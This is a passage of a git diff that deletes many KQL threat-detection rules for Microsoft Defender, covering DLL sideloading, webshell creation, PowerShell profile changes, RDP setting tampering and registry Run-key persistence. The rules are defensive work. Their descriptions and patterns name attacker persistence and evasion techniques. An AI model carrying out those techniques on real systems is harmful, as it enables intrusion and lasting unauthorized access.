endswith "\\rtworkq.dll" or FolderPath endswith "\\samcli.dll" or FolderPath endswith "\\samlib.dll" or FolderPath endswith "\\sapi_onecore.dll" or FolderPath endswith "\\sas.dll" or FolderPath endswith "\\scansetting.dll" or FolderPath endswith "\\scecli.dll" or FolderPath endswith "\\schedcli.dll" or FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\shell32.dll" or FolderPath endswith "\\slc.dll" or FolderPath endswith "\\snmpapi.dll" or FolderPath endswith "\\spp.dll" or FolderPath endswith "\\sppc.dll" or FolderPath endswith "\\srclient.dll" or FolderPath endswith "\\srpapi.dll" or FolderPath endswith "\\srvcli.dll" or FolderPath endswith "\\ssp.exe_rsaenh.dll" or FolderPath endswith "\\ssp_isv.exe_rsaenh.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\ssshim.dll" or FolderPath endswith "\\staterepository.core.dll" or FolderPath endswith "\\structuredquery.dll" or FolderPath endswith "\\sxshared.dll" or FolderPath endswith "\\tapi32.dll" 
or FolderPath endswith "\\tbs.dll" or FolderPath endswith "\\tdh.dll" or FolderPath endswith "\\tquery.dll" or FolderPath endswith "\\tsworkspace.dll" or FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\twext.dll" or FolderPath endswith "\\twinapi.dll" or FolderPath endswith "\\twinui.appcore.dll" or FolderPath endswith "\\uianimation.dll" or FolderPath endswith "\\uiautomationcore.dll" or FolderPath endswith "\\uireng.dll" or FolderPath endswith "\\uiribbon.dll" or FolderPath endswith "\\updatepolicy.dll" or FolderPath endswith "\\userenv.dll" or FolderPath endswith "\\utildll.dll" or FolderPath endswith "\\uxinit.dll" or FolderPath endswith "\\uxtheme.dll" or FolderPath endswith "\\vaultcli.dll" or FolderPath endswith "\\virtdisk.dll" or FolderPath endswith "\\vssapi.dll" or FolderPath endswith "\\vsstrace.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\wcmapi.dll" or FolderPath endswith "\\wcnnetsh.dll" or FolderPath endswith "\\wdi.dll" or FolderPath endswith "\\wdscore.dll" or FolderPath endswith "\\webservices.dll" or FolderPath endswith "\\wecapi.dll" or FolderPath endswith "\\wer.dll" or FolderPath endswith "\\wevtapi.dll" or FolderPath endswith "\\whhelper.dll" or FolderPath endswith "\\wimgapi.dll" or FolderPath endswith "\\winbrand.dll" or FolderPath endswith "\\windows.storage.dll" or FolderPath endswith "\\windows.storage.search.dll" or FolderPath endswith "\\windowscodecs.dll" or FolderPath endswith "\\windowscodecsext.dll" or FolderPath endswith "\\windowsudk.shellcommon.dll" or FolderPath endswith "\\winhttp.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\winipsec.dll" or FolderPath endswith "\\winmde.dll" or FolderPath endswith "\\winmm.dll" or FolderPath endswith "\\winnsi.dll" or FolderPath endswith "\\winrnr.dll" or FolderPath endswith "\\winsqlite3.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\wkscli.dll" or FolderPath 
endswith "\\wlanapi.dll" or FolderPath endswith "\\wlancfg.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\wlidprov.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\wmidcom.dll" or FolderPath endswith "\\wmiutils.dll" or FolderPath endswith "\\wmsgapi.dll" or FolderPath endswith "\\wofutil.dll" or FolderPath endswith "\\wpdshext.dll" or FolderPath endswith "\\wshbth.dll" or FolderPath endswith "\\wshelper.dll" or FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\wwapi.dll" or FolderPath endswith "\\xmllite.dll" or FolderPath endswith "\\xolehlp.dll" or FolderPath endswith "\\xwizards.dll" or FolderPath endswith "\\xwtpw32.dll" or FolderPath endswith "\\aclui.dll" or FolderPath endswith "\\bderepair.dll" or FolderPath endswith "\\bootmenuux.dll" or FolderPath endswith "\\dcntel.dll" or FolderPath endswith "\\dwmcore.dll" or FolderPath endswith "\\dynamoapi.dll" or FolderPath endswith "\\fhsvcctl.dll" or FolderPath endswith "\\fxsst.dll" or FolderPath endswith "\\inproclogger.dll" or FolderPath endswith "\\iumbase.dll" or FolderPath endswith "\\kdstub.dll" or FolderPath endswith "\\maintenanceui.dll" or FolderPath endswith "\\mdmdiagnostics.dll" or FolderPath endswith "\\mintdh.dll" or FolderPath endswith "\\msdtctm.dll" or FolderPath endswith "\\nettrace.dll" or FolderPath endswith "\\osksupport.dll" or FolderPath endswith "\\reseteng.dll" or FolderPath endswith "\\resetengine.dll" or FolderPath endswith "\\spectrumsyncclient.dll" or FolderPath endswith "\\srcore.dll" or FolderPath endswith "\\systemsettingsthresholdadminflowui.dll" or FolderPath endswith "\\timesync.dll" or FolderPath endswith "\\upshared.dll" or FolderPath endswith "\\wmpdui.dll" or FolderPath endswith "\\wwancfg.dll" or FolderPath endswith "\\dpx.dll" or FolderPath endswith "\\fxsapi.dll" or FolderPath endswith "\\fxstiff.dll" or FolderPath endswith "\\xpsservices.dll" or FolderPath endswith "\\appvpolicy.dll" or FolderPath endswith 
"\\batmeter.dll" or FolderPath endswith "\\bootux.dll" or FolderPath endswith "\\cmutil.dll" or FolderPath endswith "\\configmanager2.dll" or FolderPath endswith "\\coredplus.dll" or FolderPath endswith "\\coreuicomponents.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\dmcommandlineutils.dll" or FolderPath endswith "\\drvstore.dll" or FolderPath endswith "\\dsprop.dll" or FolderPath endswith "\\dxcore.dll" or FolderPath endswith "\\edgeiso.dll" or FolderPath endswith "\\framedynos.dll" or FolderPath endswith "\\fveskybackup.dll" or FolderPath endswith "\\fvewiz.dll" or FolderPath endswith "\\gpapi.dll" or FolderPath endswith "\\icmp.dll" or FolderPath endswith "\\ifsutil.dll" or FolderPath endswith "\\iumsdk.dll" or FolderPath endswith "\\lockhostingframework.dll" or FolderPath endswith "\\lrwizdll.dll" or FolderPath endswith "\\mbaexmlparser.dll" or FolderPath endswith "\\mfc42u.dll" or FolderPath endswith "\\msiso.dll" or FolderPath endswith "\\msvcp110_win.dll" or FolderPath endswith "\\netapi32.dll" or FolderPath endswith "\\netjoin.dll" or FolderPath endswith "\\netprovfw.dll" or FolderPath endswith "\\opcservices.dll" or FolderPath endswith "\\pkeyhelper.dll" or FolderPath endswith "\\playsndsrv.dll" or FolderPath endswith "\\powrprof.dll" or FolderPath endswith "\\prntvpt.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\proximitycommon.dll" or FolderPath endswith "\\proximityservicepal.dll" or FolderPath endswith "\\rasdlg.dll" or FolderPath endswith "\\security.dll" or FolderPath endswith "\\sppcext.dll" or FolderPath endswith "\\srmtrace.dll" or FolderPath endswith "\\tpmcoreprovisioning.dll" or FolderPath endswith "\\umpdc.dll" or FolderPath endswith "\\unattend.dll" or FolderPath endswith "\\urlmon.dll" or FolderPath endswith "\\vdsutil.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\winbio.dll" or FolderPath endswith "\\windows.ui.immersive.dll" or FolderPath endswith "\\winscard.dll" or 
FolderPath endswith "\\winsync.dll" or FolderPath endswith "\\wscapi.dll" or FolderPath endswith "\\wsmsvc.dll" or FolderPath endswith "\\FxsCompose.dll" or FolderPath endswith "\\WfsR.dll" or FolderPath endswith "\\rpchttp.dll" or FolderPath endswith "\\storageusage.dll" or FolderPath endswith "\\amsi.dll" or FolderPath endswith "\\PrintIsolationProxy.dll" or FolderPath endswith "\\msdtcVSp1res.dll" or FolderPath endswith "\\rdpendp.dll" or FolderPath endswith "\\dxilconv.dll" or FolderPath endswith "\\utcutil.dll" or FolderPath endswith "\\appraiser.dll" or FolderPath endswith "\\dsound.dll" or FolderPath endswith "\\DispBroker.dll" or FolderPath endswith "\\FXSRESM.DLL" or FolderPath endswith "\\cryptnet.dll" or FolderPath endswith "\\COMRES.DLL" or FolderPath endswith "\\igdumdim64.dll" or FolderPath endswith "\\igd10iumd64.dll" or FolderPath endswith "\\igd12umd64.dll" or FolderPath endswith "\\igdusc64.dll" or FolderPath endswith "\\WLBSCTRL.dll" or FolderPath endswith "\\TSMSISrv.dll" or FolderPath endswith "\\TSVIPSrv.dll" or FolderPath endswith "\\wow64log.dll" or FolderPath endswith "\\WptsExtensions.dll" or FolderPath endswith "\\wbemcomn.dll") and (not(((FolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" and FolderPath endswith "\\version.dll") or (FolderPath endswith "\\cscui.dll" and FolderPath startswith "C:\\Windows\\Microsoft.NET\\") or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SystemTemp\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\")))) and (not(((FolderPath contains "C:\\Program Files\\Arsenal-Image-Mounter-" and (FolderPath endswith "\\mi.dll" or FolderPath endswith "\\miutils.dl")) or FolderPath contains 
"C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or ((FolderPath contains "C:\\Program Files\\CheckPoint\\" or FolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and FolderPath endswith "\\PolicyManager.dll" and (InitiatingProcessFolderPath contains "C:\\Program Files\\CheckPoint\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and InitiatingProcessFolderPath endswith "\\SmartConsole.exe") or (FolderPath contains ":\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" or InitiatingProcessFolderPath contains "C:\\Windows\\System32\\backgroundTaskHost.exe")) or (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and InitiatingProcessFolderPath endswith "\\wldp.dll") or (FolderPath contains "C:\\Program Files\\Microsoft\\Exchange Server\\" and FolderPath endswith "\\mswb7.dll") or (FolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" and InitiatingProcessFolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe"))))
\ No newline at end of file
diff --git a/Persistence/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql b/Persistence/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql
deleted file mode 100644
index 224f54fb..00000000
--- a/Persistence/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/03/13
-// Level: medium
-// Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\libwazuhshared.dll" or FolderPath endswith "\\libwinpthread-1.dll") and (not((FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Program Files (x86)\\"))) and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\ProgramData\\") and FolderPath endswith "\\mingw64\\bin\\libwinpthread-1.dll")))
\ No newline at end of file
diff --git a/Persistence/Potential_Webshell_Creation_On_Static_Website.kql b/Persistence/Potential_Webshell_Creation_On_Static_Website.kql
deleted file mode 100644
index 77f667ad..00000000
--- a/Persistence/Potential_Webshell_Creation_On_Static_Website.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community, Tim Shelton, Thurein Oo
-// Date: 2019/10/22
-// Level: medium
-// Description: Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.
-// Tags: attack.persistence, attack.t1505.003
-DeviceFileEvents
-| where (((FolderPath contains ".ashx" or FolderPath contains ".asp" or FolderPath contains ".ph" or FolderPath contains ".soap") and FolderPath contains "\\inetpub\\wwwroot\\") or (FolderPath contains ".ph" and (FolderPath contains "\\www\\" or FolderPath contains "\\htdocs\\" or FolderPath contains "\\html\\"))) and (not((FolderPath contains "\\xampp" or InitiatingProcessFolderPath =~ "System" or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\Temp\\"))))
\ No newline at end of file
diff --git a/Persistence/Potentially_Suspicious_ODBC_Driver_Registered.kql b/Persistence/Potentially_Suspicious_ODBC_Driver_Registered.kql
deleted file mode 100644
index 3ba6f4bf..00000000
--- a/Persistence/Potentially_Suspicious_ODBC_Driver_Registered.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/23
-// Level: high
-// Description: Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location
-// Tags: attack.persistence, attack.t1003
-DeviceRegistryEvents
-| where (RegistryValueData contains ":\\PerfLogs\\" or RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Registration\\CRMLog" or RegistryValueData contains ":\\Windows\\System32\\com\\dmp\\" or RegistryValueData contains ":\\Windows\\System32\\FxsTmp\\" or RegistryValueData contains ":\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\drivers\\color\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\PRINTERS\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\SERVERS\\" or RegistryValueData contains ":\\Windows\\System32\\Tasks_Migrated\\" or RegistryValueData contains ":\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\com\\dmp\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\FxsTmp\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or RegistryValueData contains ":\\Windows\\Tasks\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains ":\\Windows\\Tracing\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\AppData\\Roaming\\") and RegistryKey contains "\\SOFTWARE\\ODBC\\ODBCINST.INI" and (RegistryKey endswith "\\Driver" or RegistryKey endswith "\\Setup")
\ No newline at end of file
diff --git a/Persistence/PowerShell_Module_File_Created.kql b/Persistence/PowerShell_Module_File_Created.kql
deleted file mode 100644
index f5d07da1..00000000
--- a/Persistence/PowerShell_Module_File_Created.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/09
-// Level: low
-// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.
-// Tags: attack.persistence
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\WindowsPowerShell\\Modules\\" or FolderPath contains "\\PowerShell\\7\\Modules\\")
\ No newline at end of file
diff --git a/Persistence/PowerShell_Module_File_Created_By_Non-PowerShell_Process.kql b/Persistence/PowerShell_Module_File_Created_By_Non-PowerShell_Process.kql
deleted file mode 100644
index 089c2a85..00000000
--- a/Persistence/PowerShell_Module_File_Created_By_Non-PowerShell_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/09
-// Level: medium
-// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process
-// Tags: attack.persistence
-DeviceFileEvents
-| where (FolderPath contains "\\WindowsPowerShell\\Modules\\" or FolderPath contains "\\PowerShell\\7\\Modules\\") and (not((InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")))
\ No newline at end of file
diff --git a/Persistence/PowerShell_Profile_Modification.kql b/Persistence/PowerShell_Profile_Modification.kql
deleted file mode 100644
index cfccee4d..00000000
--- a/Persistence/PowerShell_Profile_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: HieuTT35, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.013
-DeviceFileEvents
-| where FolderPath endswith "\\Microsoft.PowerShell_profile.ps1" or FolderPath endswith "\\PowerShell\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7-preview\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7\\profile.ps1" or FolderPath endswith "\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" or FolderPath endswith "\\WindowsPowerShell\\profile.ps1"
\ No newline at end of file
diff --git a/Persistence/PowerShell_Script_Dropped_Via_PowerShell.EXE.kql b/Persistence/PowerShell_Script_Dropped_Via_PowerShell.EXE.kql
deleted file mode 100644
index 0ba4babc..00000000
--- a/Persistence/PowerShell_Script_Dropped_Via_PowerShell.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2023/05/09
-// Level: low
-// Description: Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.
-// Tags: attack.persistence
-DeviceFileEvents
-| where ((InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".ps1") and (not(((FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath startswith "C:\\Users\\") or FolderPath contains "__PSScriptPolicyTest_" or FolderPath startswith "C:\\Windows\\Temp\\")))
\ No newline at end of file
diff --git a/Persistence/Powerup_Write_Hijack_DLL.kql b/Persistence/Powerup_Write_Hijack_DLL.kql
deleted file mode 100644
index b2cd19b0..00000000
--- a/Persistence/Powerup_Write_Hijack_DLL.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Subhash Popuri (@pbssubhash)
-// Date: 2021/08/21
-// Level: high
-// Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.
-In it's default mode, it builds a self deleting .bat file which executes malicious command.
-The detection rule relies on creation of the malicious bat file (debug.bat by default).
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.001
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".bat"
\ No newline at end of file
diff --git a/Persistence/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql b/Persistence/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql
deleted file mode 100644
index db3f32f1..00000000
--- a/Persistence/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2023/05/05
-// Level: high
-// Description: Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.
-Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1068
-DeviceFileEvents
-| where (FolderPath contains "\\PROCEXP" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe")))
\ No newline at end of file
diff --git a/Persistence/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql b/Persistence/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql
deleted file mode 100644
index c6201772..00000000
--- a/Persistence/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: medium
-// Description: Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1068
-DeviceFileEvents
-| where (FolderPath contains "\\procmon" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe")))
\ No newline at end of file
diff --git a/Persistence/RDP_Sensitive_Settings_Changed.kql b/Persistence/RDP_Sensitive_Settings_Changed.kql
deleted file mode 100644
index 7dbac35c..00000000
--- a/Persistence/RDP_Sensitive_Settings_Changed.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
-// Date: 2022/08/06
-// Level: high
-// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
-Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc
-
-// Tags: attack.defense_evasion, attack.persistence, attack.t1112
-DeviceRegistryEvents
-| where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)", "DWORD (0x00000003)", "DWORD (0x00000004)")) and (RegistryKey contains "\\Control\\Terminal Server" or RegistryKey contains "\\Windows NT\\Terminal Services") and RegistryKey endswith "\\Shadow") or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Control\\Terminal Server" or RegistryKey contains "\\Windows NT\\Terminal Services") and (RegistryKey endswith "\\DisableRemoteDesktopAntiAlias" or RegistryKey endswith "\\DisableSecuritySettings" or RegistryKey endswith "\\fAllowUnsolicited" or RegistryKey endswith "\\fAllowUnsolicitedFullControl")) or (RegistryKey contains "\\Control\\Terminal Server\\InitialProgram" or RegistryKey contains "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\services\\TermService\\Parameters\\ServiceDll" or RegistryKey contains "\\Windows NT\\Terminal Services\\InitialProgram")
\ No newline at end of file
diff --git a/Persistence/RDP_Sensitive_Settings_Changed_to_Zero.kql b/Persistence/RDP_Sensitive_Settings_Changed_to_Zero.kql
deleted file mode 100644
index a60a95e8..00000000
--- a/Persistence/RDP_Sensitive_Settings_Changed_to_Zero.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
-// Date: 2022/09/29
-// Level: medium
-// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
-Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
-
-// Tags: attack.defense_evasion, attack.persistence, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\fDenyTSConnections" or RegistryKey endswith "\\fSingleSessionPerUser" or RegistryKey endswith "\\UserAuthentication")
\ No newline at end of file
diff --git a/Persistence/Register_New_IFiltre_For_Persistence.kql b/Persistence/Register_New_IFiltre_For_Persistence.kql
deleted file mode 100644
index 0a90454d..00000000
--- a/Persistence/Register_New_IFiltre_For_Persistence.kql
+++ /dev/null
@@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/21 -// Level: medium -// Description: Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. -You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files. - -// Tags: attack.persistence -DeviceRegistryEvents -| where ((RegistryKey contains "\\SOFTWARE\\Classes\\CLSID" and RegistryKey contains "\\PersistentAddinsRegistered\\{89BCB740-6119-101A-BCB7-00DD010655AF}") or (RegistryKey contains "\\SOFTWARE\\Classes\\." and RegistryKey contains "\\PersistentHandler")) and (not(((RegistryKey contains "\\CLSID\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}" or RegistryKey contains "\\CLSID\\{4887767F-7ADC-4983-B576-88FB643D6F79}" or RegistryKey contains "\\CLSID\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}" or RegistryKey contains "\\CLSID\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}" or RegistryKey contains "\\CLSID\\{098f2470-bae0-11cd-b579-08002b30bfeb}" or RegistryKey contains "\\CLSID\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}" or RegistryKey contains "\\CLSID\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}" or RegistryKey contains "\\CLSID\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}" or RegistryKey contains "\\CLSID\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}" or RegistryKey contains "\\CLSID\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}" or RegistryKey contains "\\CLSID\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}" or RegistryKey contains "\\CLSID\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}" or RegistryKey contains "\\CLSID\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}" or RegistryKey contains "\\CLSID\\{5e941d80-bf96-11cd-b579-08002b30bfeb}" or RegistryKey contains "\\CLSID\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}" or RegistryKey contains "\\CLSID\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}" or RegistryKey contains 
"\\CLSID\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}" or RegistryKey contains "\\CLSID\\{9694E38A-E081-46ac-99A0-8743C909ACB6}" or RegistryKey contains "\\CLSID\\{98de59a0-d175-11cd-a7bd-00006b827d94}" or RegistryKey contains "\\CLSID\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}" or RegistryKey contains "\\CLSID\\{B4132098-7A03-423D-9463-163CB07C151F}" or RegistryKey contains "\\CLSID\\{d044309b-5da6-4633-b085-4ed02522e5a5}" or RegistryKey contains "\\CLSID\\{D169C14A-5148-4322-92C8-754FC9D018D8}" or RegistryKey contains "\\CLSID\\{DD75716E-B42E-4978-BB60-1497B92E30C4}" or RegistryKey contains "\\CLSID\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}" or RegistryKey contains "\\CLSID\\{E772CEB3-E203-4828-ADF1-765713D981B8}" or RegistryKey contains "\\CLSID\\{eec97550-47a9-11cf-b952-00aa0051fe20}" or RegistryKey contains "\\CLSID\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}") or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\"))))
\ No newline at end of file
diff --git a/Persistence/Registry_Modification_to_Hidden_File_Extension.kql b/Persistence/Registry_Modification_to_Hidden_File_Extension.kql
deleted file mode 100644
index 3332821a..00000000
--- a/Persistence/Registry_Modification_to_Hidden_File_Extension.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/22
-// Level: medium
-// Description: Hides the file extension through modification of the registry
-// Tags: attack.persistence, attack.t1137
-DeviceRegistryEvents
-| where (RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt")
\ No newline at end of file
diff --git a/Persistence/Registry_Persistence_via_Explorer_Run_Key.kql b/Persistence/Registry_Persistence_via_Explorer_Run_Key.kql
deleted file mode 100644
index 6bb67120..00000000
--- a/Persistence/Registry_Persistence_via_Explorer_Run_Key.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), oscd.community
-// Date: 2018/07/18
-// Level: high
-// Description: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryValueData contains ":\\$Recycle.bin\\" or RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Default\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run"
\ No newline at end of file
diff --git a/Persistence/Rundll32_Registered_COM_Objects.kql b/Persistence/Rundll32_Registered_COM_Objects.kql
deleted file mode 100644
index 314c9c8a..00000000
--- a/Persistence/Rundll32_Registered_COM_Objects.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/02/13
-// Level: high
